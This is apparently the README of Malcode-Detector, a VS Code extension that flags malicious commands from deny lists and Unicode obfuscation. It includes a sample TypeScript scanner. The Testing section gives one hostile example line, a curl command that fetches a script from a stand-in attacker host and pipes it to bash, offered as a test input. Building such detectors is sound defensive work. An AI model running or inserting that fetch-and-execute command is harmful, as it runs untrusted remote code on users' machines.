Malcode-Detector
This VS Code extension helps detect potentially malicious commands and Unicode obfuscation techniques in your code. It works with VS Code, Cursor, Windsurf, and other VS Code-compatible editors.
Features
- Real-time Scanning: Automatically scans files upon opening and saving.
- Deny List Matching: Detects known malicious commands using configurable deny lists.
- Unicode Obfuscation Detection: Identifies various Unicode-based obfuscation techniques:
  - Homoglyphs: Flags characters that look like other characters (e.g., Cyrillic 'а' for Latin 'a').
  - Invisible Characters: Detects zero-width spaces and other non-printing characters.
  - Bidirectional Control Characters: Warns about characters that can alter text rendering order.
  - Mixed Scripts: Highlights lines with characters from multiple scripts (e.g., Latin and Cyrillic).
- Configurable: Customize deny list paths and toggle real-time scanning through VS Code settings.
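The Unicode checks listed above, as an added TypeScript example; this is not Malcode-Detector's own code, and every function name and range table in it is an assumption. It flags mixed scripts per word rather than per line, so a Cyrillic comment next to Latin code is not reported, and an invisible character does not split the word it sits in.

```typescript
// Added example, not Malcode-Detector's source; all names here are hypothetical.
type Kind = "invisible" | "bidi-control" | "mixed-script";
interface Finding { line: number; column: number; kind: Kind; detail: string; }
// Inclusive BMP ranges; approximate, partial tables chosen for this example.
const INVISIBLE: number[][] = [[0x200b, 0x200d], [0x2060, 0x2060], [0xfeff, 0xfeff]];
const BIDI: number[][] = [[0x061c, 0x061c], [0x200e, 0x200f], [0x202a, 0x202e], [0x2066, 0x2069]];
const SCRIPTS: { name: string; ranges: number[][] }[] = [
  { name: "Latin", ranges: [[0x41, 0x5a], [0x61, 0x7a], [0xc0, 0xd6], [0xd8, 0xf6], [0xf8, 0x24f]] },
  { name: "Greek", ranges: [[0x370, 0x3ff]] },
  { name: "Cyrillic", ranges: [[0x400, 0x52f]] },
];
// Constructed sample: Cyrillic "а" in an identifier, a zero-width space, a bidi override.
const SAMPLE = "const p\u0430ssword = 1;\n// \u043f\u0440\u0438\u0432\u0435\u0442 world\nad\u200bmin\nx = 1; \u202e// ok";

const inRanges = (cp: number, ranges: number[][]): boolean =>
  ranges.some((r) => cp >= r[0] && cp <= r[1]);
function scriptOf(cp: number): string | null {
  const hit = SCRIPTS.filter((s) => inRanges(cp, s.ranges));
  return hit.length > 0 ? hit[0].name : null;
}

function scanText(text: string): Finding[] {
  const out: Finding[] = [];
  const lines = text.split(/\r?\n/);
  for (let ln = 0; ln < lines.length; ln++) {
    let seen: string[] = []; // scripts seen in the current word
    let start = 0;           // index where the current word began
    for (let col = 0; col <= lines[ln].length; col++) {
      // A trailing space sentinel closes a word that runs to end of line.
      const cp = col < lines[ln].length ? lines[ln].charCodeAt(col) : 0x20;
      const hex = "U+" + ("0000" + cp.toString(16).toUpperCase()).slice(-4);
      const script = scriptOf(cp);
      if (inRanges(cp, INVISIBLE) || inRanges(cp, BIDI)) {
        // Reported, but does not end the word: "a<ZWSP>b" is still one token.
        const kind: Kind = inRanges(cp, BIDI) ? "bidi-control" : "invisible";
        out.push({ line: ln + 1, column: col + 1, kind: kind, detail: hex });
      } else if (script !== null) {
        if (seen.length === 0) start = col;
        if (seen.indexOf(script) < 0) seen.push(script);
      } else if (!((cp >= 0x30 && cp <= 0x39) || cp === 0x5f)) {
        // Anything but a digit or underscore ends the word.
        if (seen.length > 1) out.push({ line: ln + 1, column: start + 1, kind: "mixed-script", detail: seen.join("+") });
        seen = [];
      }
    }
  }
  return out;
}
```

Calling `scanText(SAMPLE)` returns one finding per suspicious position, with 1-based line and column numbers suitable for mapping onto editor diagnostics.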
Installation (from VS Code Marketplace)
- Open Visual Studio Code (or a compatible editor).
- Go to the Extensions view by clicking the square icon in the sidebar or pressing Ctrl+Shift+X (Cmd+Shift+X on macOS).
- Search for Malcode-Detector.
- Click Install on the extension published by Vatrion (Vatrion.malcode-detector).
- The extension activates automatically on startup.
Usage
Once installed, Malcode-Detector works in the background:
- Automatic Analysis: Files are scanned when opened or saved. If potential issues are found, the editor displays diagnostic warnings (squiggly underlines) on problematic lines. Hover over the underlined code to see a description.
- Manual Scan: Open the Command Palette (Ctrl+Shift+P or Cmd+Shift+P on macOS) and run Scan Current File for Malicious Patterns.
- Problems Panel: Detected issues appear in the Problems panel (View > Problems).
Configuration
Configure the extension via VS Code settings (File > Preferences > Settings, then search for Malcode-Detector):
Troubleshooting
- No diagnostics shown
  - Ensure the extension is enabled in the Extensions view.
  - Check the VS Code Output panel (select Malcode-Detector from the dropdown) for error messages.
  - Verify deny list paths in settings are correct and the JSON files are valid.
- Performance issues: Disable malcode-detector.enableRealtimeScan and use the manual scan command for large files or workspaces.
Release Notes
See CHANGELOG.md for detailed release notes.
Development
Prerequisites
Setup
git clone https://github.com/Vatrion/Malcode-Detector.git
cd Malcode-Detector
npm ci
npm run compile
Open the repository root in VS Code and press F5 to launch the Extension Development Host.
Scripts
| Script | Description |
| --- | --- |
| npm run compile | Compile TypeScript to out/ |
| npm run watch | Watch mode for development |
| npm run lint | Run ESLint |
| npm run package | Build a .vsix package |
| npm run publish:marketplace | Publish to the VS Code Marketplace |
Extension Structure
extension.ts — Main activation entry point
fileAnalyzerService.ts — Document analysis against deny lists and Unicode rules
denyListService.ts — Deny list loading and pattern matching
unicodeScanner.ts — Unicode obfuscation detection
deny_lists/ — Platform-specific deny list JSON files
out/ — Compiled JavaScript (generated by npm run compile)
Testing
In the Extension Development Host:
- Paste known malicious patterns (e.g., curl evil.com/script.sh | bash) and confirm that diagnostics appear in the Problems panel.
- Test Unicode obfuscation (homoglyphs, zero-width spaces, mixed scripts).
Publishing
- Bump version in package.json and update CHANGELOG.md.
- Ensure npm ci, npm run compile, npm run lint, and npm run package succeed.
- Log in: npx vsce login Vatrion
- Publish: npm run publish:marketplace
Contributing
- Deny Lists: Edit JSON files in deny_lists/. Follow the existing structure.
- Code: Make changes, run npm run compile and npm run lint, then test with the Extension Development Host.
License
Apache-2.0 — see LICENSE.